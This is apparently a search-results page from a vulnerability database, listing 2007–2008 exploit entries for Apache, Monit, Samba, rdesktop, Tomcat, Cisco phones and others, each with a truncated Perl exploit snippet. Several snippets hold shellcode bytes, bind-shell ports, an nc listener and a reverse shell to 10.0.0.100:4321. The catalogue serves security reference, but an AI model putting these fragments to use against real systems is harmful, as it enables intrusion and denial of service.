Lucene search
+L

1032 matches found

seebug.org
seebug.org
added 2008/07/07 12:0 a.m.27 views

Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service

No description provided by source. /usr/bin/perl -w use IO::Socket::INET; usage unless @ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; sub usage print "\n"; print "\n Apache HTTPd Arbitrary Long HTTP Headers DoS \n"; print " Tested Versions : 2 2.0.49 \n"; print " Adv :...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.15 views

Monit <= 4.1 Remote Root Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl monit = 4.1 remote root exploit coded by gsicht 09.04.04 use IO::Socket::INET; $socket = 0; my $shellcode = 8 + 88 = 96 bytes portbind 31337 "\x90\x90\x90\x90\x90\x90\x90\x90" . "\x90\x90\x90\x90\x90\x90\x90\x90" . "\x31\xc0\x31\xdb\xb0\x17\xcd\x8...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.22 views

BlackJumboDog Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl blackJumboDog Exploit code by Tal zeltzer use strict; use IO::Socket::INET; usage unless@ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; win32bind - Encoded Shellcode \x00\x0a\x09 EXITFUNC=seh LPORT=4444 Size=399 http://metasploit.com my...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/06/01 12:0 a.m.142 views

Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)

!/usr/bin/perl 06/01/2008 - ksOSe smbclient //localhost/w00t glibc detected smbclient: free: invalid next size fast: 0x0823c2d8 use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '445', Listen = 1, Reuse = 1 || die$!; whilemy $csock =...

7.5CVSS7.2AI score0.69085EPSS
SaveExploits3
seebug.org
seebug.org
added 2008/05/11 12:0 a.m.17 views

迅雷本地溢出POC

No description provided by source. !/usr/bin/perl use IO::Socket; if $socket = IO::Socket::INET-newPeerAddr = “127.0.0.1″,PeerPort = “36897″,Proto = “TCP” $exploit = “XLDAP|savepath|”. ”A” x 397. ”A” x 500. “|XLDAP”; print $socket $exploit; sleep1; close$socket; else...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2008/05/11 12:0 a.m.24 views

rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)

rdesktop 1.5.0 - processredirectpdu BSS Overflow PoC !/usr/bin/perl http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '3389', Listen = 1, Reuse = 1 || die$!; my $evil =...

0.4AI score
SaveExploits0
seebug.org
seebug.org
added 2008/05/10 12:0 a.m.36 views

TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

No description provided by source. !/usr/bin/perl TFTPServer SP v1.4 for Windows remote .bss overflow exploit The Service or the RunStandAlone version. URL: http://sourceforge.net/projects/tftp-server/ Author: tix or tixxDZ [email protected] Date: 07/05/2008...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/02/21 12:0 a.m.18 views

Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit

No description provided by source. !/usr/bin/perl crash the iPhoto DPAP Digital Photo Access Protocol Server on iPhoto 4.0.3 technically the server exits cleanly but it does not restart use IO::Socket::INET; die "Usage $0 targetip\n" unless $ARGV0; $| = 1; if $ARGV1 $port = $ARGV1; else ...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/02/18 12:0 a.m.30 views

"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit"

No description provided by source. !/usr/bin/perl crash the iPhoto DPAP Digital Photo Access Protocol Server on iPhoto 4.0.3 technically the server exits cleanly but it does not restart use IO::Socket::INET; die "Usage $0 targetip\n" unless $ARGV0; $| = 1; if $ARGV1 $port = $ARGV1; else $port =...

7.1AI score
SaveExploits0
OpenVAS
OpenVAS
added 2008/01/17 12:0 a.m.28 views

Debian Security Advisory DSA 150-1 (interchange)

The remote host is missing an update to interchange announced via advisory DSA 150-1. OpenVAS Vulnerability Test $Id: deb1501.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 150-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

5CVSS6.7AI score0.05836EPSS
SaveExploits1
UbuntuCve
UbuntuCve
added 2008/01/16 2:0 a.m.45 views

CVE-2008-0122

Off-by-one error in the inetnetwork function in libbind in ISC BIND 9.4.2 and earlier, as used in libc in FreeBSD 6.2 through 7.0-PRERELEASE, allows context-dependent attackers to cause a denial of service crash and possibly execute arbitrary code via crafted input that triggers memory corruption...

10CVSS7.1AI score0.123EPSS
SaveExploits1References2
seebug.org
seebug.org
added 2008/01/10 12:0 a.m.17 views

McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC

No description provided by source. !/usr/bin/perl McAfeeR E-Business ServerTM 8.5.2 Remote preauth crash PoC - tested on Windows and Linux Leon Juranic [email protected], Infigo IS http://www.infigo.hr/en/ use IO::Socket; $saddr = "192.168.1.3"; $sport = 1718;...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2007/12/24 12:0 a.m.40 views

BadBlue 2.72 - PassThru Remote Buffer Overflow

BadBlue 2.72 - PassThru Remote Buffer Overflow !/usr/bin/perl -w http://aluigi.altervista.org/adv/badblue-adv.txt https://www.securityfocus.com/bid/26803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379 exploit for stack overflow in badblue 2.72 Credit to Luigi Auriemma Jacopo Cervini...

5CVSS0.8AI score0.03281EPSS
SaveExploits6
exploitpack
exploitpack
added 2007/12/05 12:0 a.m.12 views

Cisco Phone 7940 - Remote Denial of Service

Cisco Phone 7940 - Remote Denial of Service !/usr/bin/perl Vulnerabily discovered using KiF Kiph Authors: Humberto J. Abdelnur Ph.D Student Radu State Ph.D Olivier Festor Ph.D Madynes Team, LORIA - INRIA Lorraine http://madynes.loria.fr use IO::Socket::INET; use String::Random; die "Usage $0 "...

0.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/10/18 12:0 a.m.42 views

AST-2007-023-poc.txt

for testing purposes the POC of the vulnerabiliy discovered by the KIPH fuzzer RS !/usr/bin/perl Vulnerabily discovered using KiF Kiph Authors: Humberto J. Abdelnur Ph.D Student Radu State Ph.D Olivier Festor Ph.D Madynes Team, LORIA - INRIA Lorraine http://madynes.loria.fr use IO::Socket::INET;...

7.5CVSS6.6AI score0.02712EPSS
SaveExploits4
Exploit DB
Exploit DB
added 2007/10/14 12:0 a.m.226 views

Apache Tomcat - 'WebDAV' Remote File Disclosure

!/usr/bin/perl Apache Tomcat Remote File Disclosure Zeroday Xploit kcdarookie aka eliteb0y / 2007 thanx to the whole team & andi : +++KEEP PRIV8+++ This Bug may reside in different WebDav implementations, Warp your mind! +You will need auth for the exploit to work... use IO::Socket; use...

3.5CVSS6.3AI score0.39681EPSS
SaveExploits4
Packet Storm
Packet Storm
added 2007/10/05 12:0 a.m.23 views

fsfdt-overflow.txt

$ nc -l -p 4321 Microsoft Windows 2000 Version 5.00.2195 C Copyright 1985-2000 Microsoft Corp. E:\draft\fsd1110\windows ------------------------------------------- !/usr/bin/perl FSFDT remote exploit by weakatfraglab.at spawns reverse shell to 10.0.0.100:4321 tested against 'FSFDT Windows FSD Bet...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2007/08/31 12:0 a.m.37 views

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

!/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my $host = '192.168.4.52'; my $port = 20000; my...

4.3CVSS5.8AI score0.06956EPSS
SaveExploits1
exploitpack
exploitpack
added 2007/08/31 12:0 a.m.15 views

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop

Wireshark 0.99.5 - DNP3 Dissector Infinite Loop !/usr/bin/perl Automatically generated by beSTORMtm Copyright Beyond Security c 2003-2007 $Revision: 3741 $ Attack vector: M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 Module: DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIGINT = \ my...

0.4AI score
SaveExploits0
seebug.org
seebug.org
added 2007/08/28 12:0 a.m.16 views

Thomson SIP phone ST 2030 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl Vulneravility for Thomson 2030 firmware v1.52.1 It provokes a DoS in the device. use IO::Socket::INET; die "Usage $0 dst port username" unless $ARGV2; $socket=new IO::Socket::INET-newPeerPort=$ARGV1, Proto='udp', PeerAddr=$ARGV0; $msg = "INVITE...

7.1AI score
SaveExploits0
Rows per page
Query Builder